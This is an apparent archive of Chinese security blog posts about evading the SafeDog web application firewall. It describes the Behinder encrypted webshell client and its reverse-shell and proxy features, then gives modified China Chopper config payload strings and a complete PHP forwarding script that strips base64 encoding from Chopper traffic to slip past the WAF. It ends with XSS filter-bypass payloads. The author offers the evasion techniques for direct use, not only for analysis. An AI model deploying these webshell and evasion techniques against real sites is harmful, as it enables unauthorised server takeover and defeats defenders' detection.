过狗 – ChaBug安全

PHP利用Apache、Nginx的特性实现免杀Webshell

Y4er — Fri, 25 Jan 2019 14:33:27 +0000

get_defined_vars()、getallheaders()是两个特性函数，我们可以通过这两个函数来构造我们的webshell。前几天看到的，一直忘记写，填坑。

环境	函数	用法
nginx	`get_defined_vars()`	返回由所有已定义变量所组成的数组
apache	`getallheaders()`	获取全部 HTTP 请求头信息

apache环境

apache和nginx环境通用

另外一种通过执行伪造的sessionid值，进行任意代码执行。

706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

冰蝎动态二进制加密过waf并修改自己菜刀过狗

Y4er — Mon, 15 Oct 2018 03:43:52 +0000

rebeyond大大出的神器冰蝎下载地址

作为新型加密网站管理客户端，冰蝎算是作为中国菜刀的替代者。我们来看下他的主要功能。

主要功能

1. 基本信息

客户端和服务端握手之后，会获取服务器的基本信息，Java、.NET版本包括环境变量、系统属性等，PHP版本会显示phpinfo的内容。

2. 文件管理

这个没什么好说的，无非是文件的增删改查，稍微不同的是上传的文件都是加密传输的，可以避免被拦截。

3. 命令执行

执行单条操作系统命令。

4. 虚拟终端

虚拟终端是模拟了一个真实的交互式Shell环境，相当于把服务器侧的Shell给搬到了客户端，在这个Shell里可以执行各种需要交互式的命令，如ssh、mysql。比如说：我们可以在这个Shell里去ssh连接服务器侧内网的其他主机，可以参考下面这个动图：

当然，如果你习惯powershell，也可以弹个powershell出来，如下图：

5. Socks代理

虚拟终端功能其实就已经部分实现了内网穿透的能力，在Shell环境里做的所有事情都是在内网环境中的。不过为了方便使用其他工具，客户端还提供了基于一句话木马的Socks代理功能，一键开启，简单高效，可以参考如下动图：

顺便说一下，代理过程中所有的流量都是在socks的基础上封装了一层AES。

6.反弹Shell

反弹Shell是突破防火墙的利器，也几乎是后渗透过程的必备步骤。提到后渗透，当然少不了metasploit，提到metasploit，当然少不了meterpreter，所以冰蝎客户端提供了两种反弹Shell的方式，常规Shell和Meterpreter，实现和metasploit的一键无缝对接。请参考如下动图：

上图演示的是Meterpreter，当然常规的Shell也可以对接metasploit，就不演示了。

7.数据库管理

常规功能，实现了数据库的可视化管理，放张截图吧：

和常规管理工具不同的是，在Java和.NET环境中，当目标机器中没有对应数据库的驱动时，会自动上传并加载数据库驱动。比如目标程序用的是MySQL的数据，但是内网有另外一台Oracle，此时就会自动上传并加载Oracle对应的驱动。

8.自定义代码

可以在服务端执行任意的Java、PHP、C#代码，这也是个常规功能，值得一提的是我们输入的代码都是加密传输的，所以不用为了躲避waf而用各种编码变形，效果请参考如下动图：

9.备忘录

渗透的时候总有很多零碎的信息需要记录，所以针对每个Shell提供了一个备忘录的功能，目前只支持纯文本，粘贴进去自动保存：

接下来我们看下他的亮点出在哪里

看下他的php一句话

为了代码可读性，我们来扩充下：

介绍下流程

首先get发起带密码的请求，服务端随机产生密钥存入session。
获取session中的密钥，然后将客户端发送的源代码进行aes加密，通过|分割，然后通过php的可变函数执行。

具体一点，比如我们客户端有一段代码

assert|eval("phpinfo();")

进行aes128加密发送给服务端，服务端用explode函数分割字符，索引为0的是assert，索引为1的是eval("phpinfo();")，然后通过可变函数执行assert("eval(\"phpinfo();\")")，这样就很清晰明了了。

过waf的效果

常规一句话菜刀链接：

新型一句话冰蝎链接：

对菜刀的修改

对这个一句话颇感兴趣，那么我们是不是可以把菜刀也改一改呢？

我本地搭建了环境，一句话内容为

先来抓包看下菜刀的请求包

在新版菜刀2016的caidao.conf中45行，%s是执行的命令

ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFtpZF0pKTs%%3D&id=%s

解密后

eval(base64_decode($_POST[id]));&id=%s

那么我们的一句话可以这样写

你也可以这样来

那么我们菜刀要改下

|assert|eval(base64_decode($_POST[id]));|&id=%s

在caidao.conf的45行就要改成

|YXNzZXJ0fGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbaWRdKSk7|&id=%s

这样和冰蝎实现的效果就一样了，同样过狗，愉快玩耍吧！

涉及到的资料，表示感谢！

https://www.t00ls.net/thread-48079-1-1.html

https://xz.aliyun.com/t/2774

本地转发过狗原理

Y4er — Mon, 20 Aug 2018 07:01:53 +0000

在土司发了篇水文，有朋友问本地转发过狗的原理。虽然早就用了但是一直没认真研究过，借此机会研究一下。脚本非原创，链接文末贴出。

发现安全狗检测特征

网站存在安全狗的情况下即使上传了一句话菜刀也连不上，尤其是iis7.5解析漏洞，xx.jpg/.php解析了一句话并且安全狗不拦截，但是连不上shell就很头疼。
首先要知道安全狗是如何检测并拦截的。“经过分析发现安全狗对菜刀的HTTP进行了拦截，菜刀的POST数据里面对eval数据进行了base64编码，安全狗也是利用该特征进行检测的。”这是脚本作者原话(这里不确定是否为原作者，因为我只是在他博客看到的文章。)
具体安全狗是否是利用该特征对菜刀的http进行检测的，我没有研究过，但是取消掉base64编码安全狗的确不拦截了，所以这里就认为是利用该特征进行检测。

菜刀post数据分析

研究转发脚本先对菜刀的post数据分析一下，方便理解脚本。
利用wireshark对菜刀抓包分析发现，当我们自写脚本执行print(“test”)时，菜刀的post数据内容为:

test=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOztwcmludCgiaGVsbG8gUEhQISIpOztlY2hvKCJ8PC0iKTtkaWUoKTs=

这里的test，为我们上传的一句话的密码””。
可以看到数据包的内容，菜刀将编码的部分解码然后发送给服务端（编码是为了防止特殊字符导致执行出现错误）。将后面的base64编码内容解码

@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;print("hello PHP!");;echo("|<-");die();

都很容易理解就不废话了。

转发脚本原理

为了便于理解我画了一张图

转发脚本源代码:

$v)
{
    if(strstr($v, "base64_decode"))
        {
            $v=str_replace("base64_decode(","",$v);
            $v=str_replace("))",")",$v);
        }else
        {
            if($k==="z0")
                $v=base64_decode($v);
        }
    $pp=$k."=".urlencode($v);
    // echo $pp;
    if($i!=0)
    {
        $poststr=$poststr."&".$pp;
    }
    else
    {
        $poststr=$pp;
    }
    $i=$i+1;
}
$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING']; 
curl_setopt($ch, CURLOPT_URL, $curl_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr); 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$result = curl_exec($ch);
curl_close($ch);
echo $result;
?>

先分析foreach这一段:

foreach($_POST as $k=>$v)
{
    if(strstr($v, "base64_decode"))
        {
            $v=str_replace("base64_decode(","",$v);
            $v=str_replace("))",")",$v);
        }else
        {
            if($k==="z0")
                $v=base64_decode($v);
        }
    $pp=$k."=".urlencode($v);
    // echo $pp;
    if($i!=0)
    {
        $poststr=$poststr."&".$pp;
    }
    else
    {
        $poststr=$pp;
    }
    $i=$i+1;
}

去除$_POST数组中的键值，利用strstr函数匹配到base64_decode函数并返回剩下的字符串，然后取出z0的值base64_decode解码。经过第一个if条件语句处理完以后数据变为

test=@eval($_POST[z0]);@ini_set(“display_errors”,”0”);@set_time_limit(0);@set_magic_quotes_runtime(0);echo(“->|”);;print(“hello PHP!”);;echo(“|<-“);die();

将数据urlencode(服务端接收参数数据时会自动解码),剩下的的代码就是将两段数据用&连接起来。

$ch = curl_init();
$curl_url = $target."?".$_SERVER['QUERY_STRING']; //获取url?后的值
curl_setopt($ch, CURLOPT_URL, $curl_url);//设置curl传输选项
curl_setopt($ch, CURLOPT_POST, 1);//发送post请求
curl_setopt($ch, CURLOPT_POSTFIELDS, $poststr);// 全部数据使用HTTP协议中的 "POST" 操作来发送 
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//TRUE 将curl_exec()获取的信息以字符串返回，而不是直接输出。
$result = curl_exec($ch);//执行
curl_close($ch);//关闭
echo $result;
?>

emmmm,cURL我理解为就是去访问shell地址的页面。这里我将注释写到了代码后面。
这里有个地方没有深入了解，就是为什么post的数据需要urlencode,我测试的时候去掉了该编码函数，菜刀连接提示页面返回信息有误，不知道是代码的原因还是不编码的话就被安全狗给拦截了。希望有懂的师傅指点一下。

参考文章：
h4ck0ne
中国菜刀原理

任重而道远

xss bypass safedog

Y4er — Wed, 15 Aug 2018 04:34:55 +0000

核心@X1r0z原创，总是有惊奇的脑回路。

ref-xss

绕过 payload 格式
<[WORD] on[EVENT]=[EVAL]>[TEXT]
在随机单词的标签内加上 on 事件, 最后在标签外加上文本.

因为 html 的松散性, 导致sb 都能被解析成标签, 并且支持触发类似于onclick onmouseover 的事件

特别小众的标签也可以绕过安全狗的规则, 比如acronym address 翻翻 w3c 的教程能找出好多

dom-xss

安全狗不存在 dom-xss 的拦截规则

基本上没有尖括号就可以绕过了, 或者使用上面的 payload

由于上下文是在 JavaScript 的环境内, 会有很多的变形

";alert(0);//
";document.write("\u003cscript\u003ealert(0)\u003c\u002fscript\u003e");//

总之先闭合然后直接弹窗 or 用docment.write 写标签

payloads

a
a
a
a
a
a
a
a
a
a
a
a
a